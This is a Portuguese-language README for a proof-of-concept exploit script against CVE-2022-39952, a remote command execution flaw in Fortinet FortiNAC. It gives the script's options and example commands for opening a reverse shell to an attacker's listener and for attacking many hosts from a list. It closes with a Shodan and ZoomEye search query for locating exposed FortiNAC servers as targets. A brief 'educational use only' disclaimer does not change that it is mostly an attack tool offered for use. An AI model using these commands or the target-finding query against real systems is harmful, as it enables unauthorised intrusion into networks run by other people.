
PoC para CVE-2022-39952 que afeta o Fortinet FortiNAC.
Este exploit permite que um atacante execute comandos arbitrários no servidor FortiNAC. Ele é baseado no PoC desenvolvido por horizon3ai, com opções adicionais para atacar múltiplos hosts.
Aviso: Este exploit é apenas para fins educacionais. Por favor, use com responsabilidade e com permissão.
usage: exploit.py [-h] [-t TARGET] [-l LIST] [-lh LHOST] [-lp LPORT]
options:
-h, --help show this help message and exit
-t TARGET, --target TARGET
The IP address of the target
-l LIST, --list LIST List of targets
-lh LHOST, --lhost LHOST
The local host for the reverse shell
-lp LPORT, --lport LPORT
The local port for the reverse shell
Para usar este exploit, você deve ter o Python 3.x instalado no seu sistema.
Python 3.x
requests module
concurrent.futures module
$ python exploit.py -t 192.168.1.100 -lh 192.168.1.10 -lp 4444
$ python exploit.py -t 192.168.1.100
$ python exploit.py -l targets.txt
Este exploit foi testado apenas em um número limitado de alvos, portanto sua eficácia pode variar. O dork para encontrar alvos potenciais no ZoomEye e Shodan é:
title:"FortiNAC" +"JSESSIONID"